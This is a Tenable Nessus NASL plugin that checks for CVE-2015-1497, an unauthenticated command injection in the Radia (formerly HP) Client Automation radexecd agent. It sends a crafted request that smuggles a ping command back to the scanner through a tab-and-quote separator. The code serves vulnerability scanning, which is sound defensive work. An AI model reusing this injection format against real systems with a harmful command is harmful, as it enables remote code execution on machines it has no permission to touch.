The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(86427);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2015-1497");
script_bugtraq_id(72612);
script_xref(name:"EDB-ID", value:"36169");
script_xref(name:"EDB-ID", value:"36206");
script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");
script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process.");
# https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-038/");
script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"General");
script_copyright(english:"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.");
script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
script_require_keys("Services/radexecd");
script_exclude_keys("global_settings/supplied_logins_only");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
# The port for the Notify daemon (radexecd)
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);
# Attack only if the detection plugin determines noauth is enabled
# for radexecd
if (get_kb_item("radexecd/" + port + "/noauth") != TRUE)
exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");
os = get_kb_item("Host/OS");
if(os && "windows" >< tolower(os))
{
injected = 'cmd.exe /c ping ' + compat::this_host();
cmd = 'hide hide"\t"' + injected;
}
# Injected command may fail if it is not available on the target
# host, but a vulnerable server will still return '\x00' in response.
else
{
injected = 'sh -c "ping -c 3 ' + compat::this_host() + '"';
cmd = 'hide hide\t' + injected;
}
s = open_sock_tcp(port);
if(!s) audit(AUDIT_SOCK_FAIL, port);
req = '\x00' + # return port; insignificant
'USER_' + SCRIPT_NAME + '\x00' +
'PASS_' + SCRIPT_NAME + '\x00' +
cmd + '\x00';
send(socket: s, data: req);
res = recv(socket: s, length:1024);
close(s);
if (isnull(res))
audit(AUDIT_RESP_NOT, port, "a Notify request");
# Vulnerable
if (res == '\x00')
security_hole(port: port);
else
exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));
Vendor | Product | Version | CPE |
---|---|---|---|
persistent_systems | radia_client_automation | cpe:/a:persistent_systems:radia_client_automation | |
hp | client_automation_enterprise | cpe:/a:hp:client_automation_enterprise |